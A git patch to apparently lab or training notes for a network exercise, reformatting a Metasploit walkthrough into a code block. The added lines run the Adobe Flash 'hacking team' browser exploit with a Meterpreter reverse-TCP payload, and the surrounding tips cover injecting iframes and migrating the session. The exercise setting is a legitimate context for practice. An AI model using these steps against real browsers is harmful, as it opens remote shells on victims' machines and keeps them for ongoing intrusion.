From 843477524d3634cdd9334a9fc1dbb51ce24f7347 Mon Sep 17 00:00:00 2001 From: Alfred Gamulo Date: Thu, 23 Jul 2020 16:58:54 -0400 Subject: [PATCH] Update Notes.md --- Kaizen/MissileDestroyer/Notes.md | 12 ++++++++++-- 1 file changed, 10 insertions(+), 2 deletions(-) diff --git a/Kaizen/MissileDestroyer/Notes.md b/Kaizen/MissileDestroyer/Notes.md index 67630bc..baf608c 100644 --- a/Kaizen/MissileDestroyer/Notes.md +++ b/Kaizen/MissileDestroyer/Notes.md @@ -441,8 +441,16 @@ IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff Pro Tip 1: We will be doing quite a bit of work in this network and will need some help. If you haven't already, help your teammates gain access to the network and divide/conquer on the machines. We suggest adding multiple iframes, one pointing to each of your teammate's tap0 IP address then have them run their own exploit to get shells. -use exploit/multi/browser/adobe_flash_hacking_team_uafset SRVPORT 80set URIPATH /set payload windows/meterpreter/reverse_tcpset LHOST runmeterpreter> psmeterpreter> migrate - +``` +meterpreter> use exploit/multi/browser/adobe_flash_hacking_team_uaf +meterpreter> set SRVPORT 80 +meterpreter> set URIPATH / +meterpreter> set payload windows/meterpreter/reverse_tcp +meterpreter> set LHOST +meterpreter> run +meterpreter> ps +meterpreter> migrate +``` Pro Tip 2: You will continue to exploit the browser and get additional shells each time the victim browses to the web page. You can turn off exploitation by killing the task with kill -K Pro Tip 3: When exploiting a user process like a web browser, you will lose your session if they close it. You can migrate your meterpreter to a more stable process.